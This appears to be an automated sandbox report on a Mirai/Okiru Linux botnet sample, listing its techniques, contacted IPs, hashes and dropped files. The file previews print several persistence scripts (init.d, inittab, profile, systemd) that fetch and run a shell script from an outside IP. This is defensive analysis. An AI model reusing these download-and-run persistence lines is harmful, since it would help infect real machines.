          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6339, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6232, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6241, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6335, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6339, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Unix Shell Configuration Modification
          1
          Unix Shell Configuration Modification
          1
          Masquerading
          1
          OS Credential Dumping
          1
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          Data Manipulation
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Systemd Service
          1
          Systemd Service
          2
          File and Directory Permissions Modification
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Scripting
          Logon Script (Windows)11
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568917 Sample: x86_32.nn.elf Startdate: 05/12/2024 Architecture: LINUX Score: 88 51 5.18.62.230, 23, 60088 ZTELECOM-ASRU Russian Federation 2->51 53 114.208.224.169, 23, 55208 XEPHIONNTT-MECorporationJP China 2->53 55 98 other IPs or domains 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Yara detected Okiru 2->59 61 Yara detected Mirai 2->61 63 Machine Learning detection for sample 2->63 8 x86_32.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 13 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 65 Sample tries to set files in /etc globally writable 8->65 67 Sample tries to persist itself using /etc/profile 8->67 69 Drops files in suspicious directories 8->69 71 2 other signatures 8->71 18 x86_32.nn.elf sh 8->18         started        20 x86_32.nn.elf sh 8->20         started        22 x86_32.nn.elf sh 8->22         started        24 6 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 73 Drops files in suspicious directories 24->73 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 3 other processes 24->41 signatures9 process10 signatures11 75 Sample tries to set files in /etc globally writable 28->75 77 Sample tries to persist itself using System V runlevels 31->77
          SourceDetectionScannerLabelLink
          x86_32.nn.elf100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          /etc/init.d/sh3%ReversingLabsText.Browser.Generic
          /etc/init.d/system3%ReversingLabsText.Browser.Generic
          /etc/rc.local0%ReversingLabs
          /etc/rc.local0%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://94.156.227.233/curl.shx86_32.nn.elffalse
            high
            http://94.156.227.233/lol.shx86_32.nn.elffalse
              high
              http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_32.nn.elffalse
                high
                http://94.156.227.233/x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.42.dr, bootcmd.12.dr, custom.service.12.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  16.90.195.142
                  unknownUnited States
                  unknownunknownfalse
                  61.233.196.40
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  47.159.109.247
                  unknownUnited States
                  5650FRONTIER-FRTRUSfalse
                  108.189.48.62
                  unknownUnited States
                  33363BHN-33363USfalse
                  138.226.170.110
                  unknownSwitzerland
                  12980EMEAHostingAutonomousSystemEUfalse
                  151.249.42.76
                  unknownUnited Kingdom
                  44574A4NAS44574GBfalse
                  121.145.192.109
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  88.11.252.160
                  unknownSpain
                  3352TELEFONICA_DE_ESPANAESfalse
                  49.86.94.59
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  194.145.118.247
                  unknownGermany
                  29108LEITWERT-RESEARCHDEfalse
                  46.250.181.70
                  unknownPoland
                  34688PL-MAVERICK-ASPLfalse
                  58.65.241.107
                  unknownIndonesia
                  24535ISATNET-AS-IDPTInsanSaranaTelematikaIDfalse
                  211.218.239.156
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  157.246.109.62
                  unknownUnited States
                  394271SPS-157-246-0-0USfalse
                  26.127.145.209
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  41.244.104.33
                  unknownCameroon
                  37620VIETTEL-CM-ASCMfalse
                  192.81.84.23
                  unknownCanada
                  30048CONVERGIA-NETCAfalse
                  215.136.166.39
                  unknownUnited States
                  721DNIC-ASBLK-00721-00726USfalse
                  108.130.142.170
                  unknownUnited States
                  16509AMAZON-02USfalse
                  86.188.53.172
                  unknownUnited Kingdom
                  2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                  218.43.149.218
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  65.241.23.79
                  unknownUnited States
                  701UUNETUSfalse
                  107.248.86.231
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  29.113.94.55
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  5.18.62.230
                  unknownRussian Federation
                  41733ZTELECOM-ASRUfalse
                  211.200.199.151
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  93.69.61.87
                  unknownItaly
                  30722VODAFONE-IT-ASNITfalse
                  168.212.74.188
                  unknownUnited States
                  10430WA-K20USfalse
                  199.188.249.152
                  unknownUnited States
                  17306RISE-BROADBANDUSfalse
                  116.31.85.121
                  unknownChina
                  58466CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCNfalse
                  121.177.189.157
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  45.71.25.54
                  unknownBrazil
                  267631AJUNETBRfalse
                  222.202.140.133
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  138.153.76.148
                  unknownUnited States
                  721DNIC-ASBLK-00721-00726USfalse
                  219.235.6.49
                  unknownChina
                  17621CNCGROUP-SHChinaUnicomShanghainetworkCNfalse
                  56.113.94.213
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  26.202.86.167
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  115.88.21.255
                  unknownKorea Republic of
                  3786LGDACOMLGDACOMCorporationKRfalse
                  79.101.112.237
                  unknownSerbia
                  8400TELEKOM-ASRSfalse
                  37.65.113.12
                  unknownFrance
                  15557LDCOMNETFRfalse
                  56.140.154.121
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  49.52.200.230
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  88.204.146.7
                  unknownKazakhstan
                  9198KAZTELECOM-ASKZfalse
                  164.237.248.89
                  unknownUnited States
                  27047DNIC-ASBLK-27032-27159USfalse
                  174.88.124.185
                  unknownCanada
                  577BACOMCAfalse
                  182.79.105.76
                  unknownIndia
                  9498BBIL-APBHARTIAirtelLtdINfalse
                  219.4.115.95
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  188.164.69.107
                  unknownUnited Kingdom
                  39356AVANTI-UK-ASGBfalse
                  14.234.225.230
                  unknownViet Nam
                  45899VNPT-AS-VNVNPTCorpVNfalse
                  175.191.68.88
                  unknownChina
                  2510INFOWEBFUJITSULIMITEDJPfalse
                  35.200.152.187
                  unknownUnited States
                  15169GOOGLEUSfalse
                  77.219.167.39
                  unknownSweden
                  1257TELE2EUfalse
                  18.10.246.197
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  114.232.54.239
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  71.118.23.202
                  unknownUnited States
                  5650FRONTIER-FRTRUSfalse
                  46.205.168.229
                  unknownPoland
                  12912TMPLfalse
                  9.237.213.78
                  unknownUnited States
                  3356LEVEL3USfalse
                  179.239.7.19
                  unknownBrazil
                  7738TelemarNorteLesteSABRfalse
                  143.191.157.249
                  unknownUnited States
                  17477MCT-SYDNEYMacquarieTelecomAUfalse
                  76.14.39.41
                  unknownUnited States
                  11404AS-WAVE-1USfalse
                  1.126.222.164
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  144.168.24.148
                  unknownUnited States
                  32931PEAKTERAUSfalse
                  44.232.218.63
                  unknownUnited States
                  16509AMAZON-02USfalse
                  58.10.75.114
                  unknownThailand
                  17552TRUE-AS-APTrueInternetCoLtdTHfalse
                  49.131.105.123
                  unknownHong Kong
                  17924SMARTONE-MB-AS-APSmarToneMobileCommunicationsLtdHKfalse
                  18.64.241.39
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  189.255.81.119
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  135.104.249.188
                  unknownUnited States
                  10455LUCENT-CIOUSfalse
                  141.22.216.117
                  unknownGermany
                  680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                  160.106.164.183
                  unknownCanada
                  715WOODYNET-2USfalse
                  119.20.76.243
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  36.163.114.52
                  unknownChina
                  9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                  93.245.89.62
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  114.208.224.169
                  unknownChina
                  9595XEPHIONNTT-MECorporationJPfalse
                  116.24.104.134
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  187.103.242.245
                  unknownBrazil
                  28283AdylnetTelecomBRfalse
                  108.68.190.123
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  70.162.134.108
                  unknownUnited States
                  22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  11.186.51.13
                  unknownUnited States
                  3356LEVEL3USfalse
                  144.33.193.131
                  unknownUnited States
                  786JANETJiscServicesLimitedGBfalse
                  158.38.111.112
                  unknownNorway
                  224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                  140.197.190.186
                  unknownUnited States
                  210WEST-NET-WESTUSfalse
                  86.3.196.5
                  unknownUnited Kingdom
                  5089NTLGBfalse
                  54.171.230.55
                  unknownUnited States
                  16509AMAZON-02USfalse
                  36.82.145.157
                  unknownIndonesia
                  7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
                  57.159.205.203
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  116.126.230.31
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  97.30.217.167
                  unknownUnited States
                  22394CELLCOUSfalse
                  48.155.61.30
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  216.240.251.4
                  unknownUnited States
                  35986VYVE-BROADBANDUSfalse
                  163.206.140.184
                  unknownUnited States
                  1843AS1843-7USfalse
                  147.201.255.206
                  unknownUnited Kingdom
                  55542RMSNET-AS-APRoadsandMaritimeServicesAUfalse
                  111.15.95.101
                  unknownChina
                  24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanyfalse
                  178.158.63.197
                  unknownUkraine
                  30822MAGEAL-ASUAfalse
                  96.222.218.77
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  66.111.1.41
                  unknownUnited States
                  11403NYINTERNETUSfalse
                  106.200.173.19
                  unknownIndia
                  45609BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSServicefalse
                  208.14.132.76
                  unknownUnited States
                  1239SPRINTLINKUSfalse
                  9.38.169.204
                  unknownUnited States
                  3356LEVEL3USfalse
                  156.60.17.48
                  unknownUnited States
                  1226CTA-42-AS1226USfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  16.90.195.142thMtniHOSgGet hashmaliciousMiraiBrowse
                    Zeus.arm5Get hashmaliciousMiraiBrowse
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      FRONTIER-FRTRUSsh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 47.207.214.232
                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                      • 96.226.10.68
                      sora.ppc.elfGet hashmaliciousMiraiBrowse
                      • 71.189.123.6
                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                      • 108.9.6.153
                      sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 47.172.249.242
                      sora.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 47.200.126.137
                      m68k.elfGet hashmaliciousMiraiBrowse
                      • 172.78.167.220
                      teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                      • 47.171.81.23
                      arm7.elfGet hashmaliciousMiraiBrowse
                      • 66.12.49.118
                      teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                      • 47.195.23.81
                      CTTNETChinaTieTongTelecommunicationsCorporationCNarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 222.35.143.254
                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 36.198.48.234
                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                      • 222.58.250.208
                      armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 110.113.89.16
                      sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 123.87.18.126
                      sora.mips.elfGet hashmaliciousMiraiBrowse
                      • 101.148.166.222
                      x86.elfGet hashmaliciousMiraiBrowse
                      • 101.156.181.236
                      m68k.elfGet hashmaliciousMiraiBrowse
                      • 110.221.143.114
                      teste.i686.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                      • 111.142.109.136
                      teste.mpsl.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                      • 222.48.74.133
                      BHN-33363USmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 208.118.8.99
                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 97.76.4.84
                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                      • 65.32.18.223
                      sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 71.44.189.203
                      sora.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 70.126.74.241
                      spc.elfGet hashmaliciousMiraiBrowse
                      • 35.143.25.232
                      la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                      • 71.47.144.224
                      la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                      • 68.202.122.111
                      la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                      • 97.69.42.206
                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                      • 47.227.159.129
                      EMEAHostingAutonomousSystemEUsora.ppc.elfGet hashmaliciousMiraiBrowse
                      • 138.227.8.69
                      teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                      • 138.224.165.206
                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                      • 170.225.208.16
                      loligang.spc.elfGet hashmaliciousMiraiBrowse
                      • 138.242.50.73
                      mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                      • 138.227.8.66
                      x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                      • 138.241.101.194
                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                      • 138.226.40.168
                      amen.x86.elfGet hashmaliciousMiraiBrowse
                      • 138.240.246.241
                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                      • 138.242.159.3
                      bin.arm7.elfGet hashmaliciousMiraiBrowse
                      • 138.241.35.86
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      /etc/init.d/systemx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                /etc/init.d/shx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):111
                                          Entropy (8bit):4.663595298101345
                                          Encrypted:false
                                          SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                          MD5:3290F4F4E0B77B577C59026DEF246CEE
                                          SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                          SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                          SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                          Malicious:false
                                          Reputation:low
                                          Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                          Process:/bin/sh
                                          File Type:POSIX shell script, ASCII text executable
                                          Category:dropped
                                          Size (bytes):355
                                          Entropy (8bit):4.416220583499086
                                          Encrypted:false
                                          SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                          MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                          SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                          SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                          SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Joe Sandbox View:
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          Reputation:low
                                          Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:POSIX shell script, ASCII text executable
                                          Category:dropped
                                          Size (bytes):98
                                          Entropy (8bit):4.615605979741142
                                          Encrypted:false
                                          SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                          MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                          SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                          SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                          SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Joe Sandbox View:
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                          Reputation:low
                                          Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):103
                                          Entropy (8bit):4.612417623467759
                                          Encrypted:false
                                          SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                          MD5:175C6814BBE06EB5816EFE3FE3934230
                                          SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                          SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                          SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                          Malicious:false
                                          Reputation:low
                                          Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):53
                                          Entropy (8bit):3.871459242626451
                                          Encrypted:false
                                          SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                          MD5:2BD9B4BE30579E633FC0191AA93DF486
                                          SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                          SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                          SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:gorilla botnet is on the device ur not a cat go away.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):94
                                          Entropy (8bit):4.486383977913608
                                          Encrypted:false
                                          SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                          MD5:CEC61C0CDC61AB271C45B85281469388
                                          SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                          SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                          SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                          Malicious:true
                                          Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:POSIX shell script, ASCII text executable
                                          Category:dropped
                                          Size (bytes):10
                                          Entropy (8bit):3.121928094887362
                                          Encrypted:false
                                          SSDEEP:3:TKH4vn:hv
                                          MD5:3E2B31C72181B87149FF995E7202C0E3
                                          SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                          SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                          SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Preview:#!/bin/sh.
                                          Process:/tmp/x86_32.nn.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):292
                                          Entropy (8bit):5.064804988275458
                                          Encrypted:false
                                          SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                          MD5:8156A50E9D158639626649BD134E7D5D
                                          SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                          SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                          SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                          Malicious:false
                                          Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):76
                                          Entropy (8bit):3.7627880354948586
                                          Encrypted:false
                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                          Malicious:false
                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                          Process:/usr/libexec/gsd-housekeeping
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:93B885ADFE0DA089CDF634904FD59F71
                                          SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                          SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                          SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                          Malicious:false
                                          Preview:.
                                          File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.4885532209033085
                                          TrID:
                                          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                          File name:x86_32.nn.elf
                                          File size:95'984 bytes
                                          MD5:c32c3d338238953b22589c540fd85e64
                                          SHA1:f8fc4a3ffd7a1fdf307a73e68edede3ee2eb49f6
                                          SHA256:abc37ba47cc9897d2b0458c13a29350d3fb933a5dc605376e728961dc877a605
                                          SHA512:cf6ec71369d31583d513a644c68fb70dc006e34a81acc2b2024568a0aea42b24d23e83a9172fb9bcf2ac85209521451ec3b361f361868416248efea8232a29ef
                                          SSDEEP:1536:dX4kVQasoSXFlxNMgS+1BcmoTeAazvk2qHNvVTi7+O93zqF7zvuSmyQRZIcQ:dX4kVQrrXFzNMgSgweAgvkXHNvw7+u3W
                                          TLSH:EC935BC4E983E4F5EE4615361177E73ACB72E57A1038FA17DF58A632EC82610A61738C
